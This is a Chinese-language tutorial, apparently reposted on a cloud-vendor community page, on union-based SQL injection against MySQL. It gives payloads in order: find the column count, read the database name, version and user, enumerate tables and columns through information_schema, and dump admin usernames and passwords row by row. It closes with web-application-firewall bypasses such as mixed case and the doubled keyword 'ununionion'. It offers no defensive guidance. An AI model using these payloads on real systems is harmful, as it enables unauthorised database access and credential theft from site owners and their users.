sql注入之mysql的聯集查詢爆破

來源:互聯網
上載者:User

標籤:包含   技術分享   roo   sel   orm   color   mat   word   意思   

mysql的聯集查詢原理就是對mysql內建的系統資料表進行查詢,因為系統資料表包含了所有資料庫的屬性。沒有access表猜不出表名列名暴力破解的尷尬。

是我針對mysql的聯集查詢,畫的系統資料表(系統資料庫)的結構

以查詢test資料庫為例:

1.判斷列數

union select 1,2,3,..........  直到頁面返回正常為止

2.判斷當前資料庫

union select  database(),2,3,4,5   1的位置將會返回資料庫的名字

資料庫名 database()

資料庫版本 version()

資料庫使用者 user()

作業系統 @@version_compile_os

3.查詢表名

union select  group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema=‘test‘

//group_concat()使多行資料在一列顯示

4.查詢列名

union select group_concat(column_name),2,3,4,5,6 from information_schema.columns where table_name=‘admin‘

5.查資料 (0x20是空格的意思)

方法一:

union select  group_concat(username,0x20,password),2,3,4,5 from test.admin  //將所有資料在一行顯示

方法二

union select  concat(username,0x20,password),2,3,4,5,6 from one.admin    //因為網頁限制只能顯示一行資料,所以顯示第一行資料 

union select  concat(username,0x20,password),2,3,4,5,6 from one.admin where username not in (‘root‘)  //把第一行的使用者排除掉,第二行自動上來

union select  concat(username,0x20,password),2,3,4,5,6 from one.admin where username not in (‘admin‘,‘root‘) //看第三行資料

 

簡單繞過waf思路:

大小寫繞過

ununionion  因為會過濾關鍵詞union,所以這樣寫過濾後,前面un和後面的ion又拼成了一個新的union

 

 

sql注入之mysql的聯集查詢爆破

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.